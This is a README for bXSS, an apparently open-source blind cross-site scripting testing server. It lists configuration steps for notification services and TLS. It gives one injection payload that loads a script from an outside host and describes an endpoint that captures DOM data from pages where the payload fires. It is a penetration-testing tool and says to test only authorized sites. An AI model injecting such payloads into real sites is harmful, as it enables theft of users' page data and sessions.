bXSS is a Blind XSS application adapted from https://cure53.de/m, you can read about it here.
bXSS supports the following:
- A server you control
- A usable domain
- Node.js and Express
- A SSL/TLS Certificate, free from Lets Encrypt (Optional)
- A Gmail account, to send reports via Nodemailer (Optional)
- A Twilio Account (Optional)
- A Slack Token (Optional)
- A Cisco Token (Optional)
- cd bXSS && npm install
- Update The Configuration || Environment Variables
- Domain
- config.url = Domain intended for use e.g ardern.io
- config.port = Port to run the Node.js app e.g 3030
- Twilio (Optional, if you don't want to use Twilio just delete all Twilio references from the config)
- config.twilio.accountSid = Twilio SID
- config.twilio.authToken = Twilio Auth Token
- config.twilio.to = ['+447500000000','+0018056826043'] Your telephone number(s)
- config.twilio.from = Twilio telephone number
- Slack (Optional, if you don't want to use Slack just delete all Slack references from the config)
- config.slack.token = Slack Token
- config.slack.channel = Channel you want to send the report to
- Slack permissions required channels:read and chat:write
- Cisco (Optional, if you don't want to use Cisco just delete all Cisco references from the config)
- config.ciscoSpark.token = Cisco Token
- config.ciscoSpark.sparkRoom = ['[email protected]','[email protected]']
- Gmail (Optional, if you don't want to use Gmail just delete all Gmail references from the config)
- config.gmail.user = Gmail Username
- config.gmail.pass = Gmail Password
- config.gmail.to = ['[email protected]','[email protected]'] Where you want to send the emails
- config.gmail.from = Who sent the message, usually Gmail Username
- Rename configExample.js to config.js
- Domain
- Start your app (depending on your preference)
- node app.js
- pm2 start app.js
- nodemon app.js
- Obtain a let's Encrypt cert
- I would recommend looking at setting up a reverse proxy, for example in NGINX and skip the next step as I wouldn't want anyone to run express as root.
- Using Node.js
- Update Configuration
- config.letsEncrypt.TLS = true;
- config.letsEncrypt.publicKey = $Path/fullchain.pem
- config.letsEncrypt.privateKey = $Path/privkey.pem
- config.letsEncrypt.ca = $Path/chain.pem
- Update Configuration
- Start your app (depending on your preference)
- node app.js
- npm2 start app.js
- nodemon app.js
Once the application is funcitonal, you would just identify sites you are authorized to test and start to inject different payloads that will attempt to load your resource, the easiest example is:
"><script src="https://example.com/m"></script>
The application has three core functions
- POST - /m (captures DOM information)
- GET - /m (Loads the payload)
- Payloads - /payloads (Gives payloads you can use for testing blind xss)
- Everything else - Loads alert(1)
If you like the project, feel free to contribute or if you want to suggest improvements or notice any problems, file a issue.